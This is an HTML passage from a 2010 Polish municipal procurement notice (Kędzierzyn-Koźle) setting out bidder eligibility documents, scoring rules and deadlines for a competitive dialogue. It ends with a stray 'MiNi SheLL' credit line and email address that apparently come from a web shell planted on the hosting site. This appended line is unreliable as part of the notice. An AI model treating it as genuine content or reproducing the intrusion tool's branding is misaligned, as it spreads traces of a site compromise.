W przypadku wykonawców występujących wspólnie, posiadane środki przez poszczególnych wykonawców podlegają sumowaniu. Dopuszczone jest również sumowanie kwoty posiadanej na koncie przez jednego wykonawcę z możliwością zaciągnięcia kredytu uzupełniającego do kwoty wymaganej przez drugiego wykonawcę.
Jeżeli Wykonawca korzysta z zasobów innego podmiotu dopuszcza się również sumowanie środków Wykonawcy ze środkami podmiotu udostępniającego swoje zasoby.
Warunkiem koniecznym jest, aby suma środków poszczególnych wykonawców wynosiła minimum 100 % wymaganych środków określonych w warunkach SIWZ.
Zamawiający będzie oceniał spełnienie powyższego warunku na podstawie złożonych dokumentów (określonych w poz. 2  wykazu dokumentów) potwierdzających jego spełnienie oraz na podstawie przyjętej punktacji tj. 50 pkt. bazowych + 5 pkt. dodatkowych za każde kolejne 50 tys. zł posiadanych środków powyżej 150 000,- zł. Wykonawca może otrzymać maksymalnie 15 pkt. dodatkowych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy (druk nr 2) o spełnieniu warunków udziału w postępowaniu wymienionych w art. 22 ust. 1 ustawy Pzp składane odpowiednio do art. 44, 50, 56, 60c, 68, 73 ustawy Pzp. 
Pełnomocnictwo wystawione wg wzoru (druk Nr 11) załączonego do niniejszego wniosku lub pełnomocnictwa udzielane przez Wykonawcę według odmiennych wzorów.
W przypadku przedkładania kopii pełnomocnictw muszą być one potwierdzone (uwierzytelnione) notarialnie za zgodność z oryginałem
Dokument potwierdzający prawo do podpisywania wniosku o dopuszczenie do postępowania lub oferty, 
a tym samym prawo składania oświadczenia woli w imieniu Wykonawcy. Może to być np. dokument rejestrowy, wypis z ewidencji działalności gospodarczej lub pełnomocnictwo, o ile prawo do składania oświadczeń woli w imieniu Wykonawcy nie wynika z dokumentu rejestrowego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Wiedza i doświadczenie - 50 pkt plus 5 pkt. dodatkowych za każdą dodatkowe 50.000 zł wykonanych dostaw powyżej  kwoty 300.000 zł w podanym okresie
Sytuacja ekonomiczna i finansowa-50 pkt  plus 5 pkt. dodatkowych za każde kolejne 50 tys. zł posiadanych środków powyżej 150 000,- zł. Wykonawca może otrzymać maksymalnie 15 pkt. dodatkowych.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki gwarancji - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie wysłana do wykonawców, którzy zostaną zaproszeni do złożenia ofert..</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Potrzebny opis znajduje się na stronie internetowej Zamawiającego we wniosku o dopuszczenie do postępowania..</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> nie przewiduje się nagród..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 14:00, miejsce: URZĄD MIASTA Kędzierzyn-Koźle
Wydział Zamówień Publicznych Urzędu Miasta Kędzierzyn-Koźle,
47-200 KĘDZIERZYN-KOŹLE ul. W. Planetorza 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com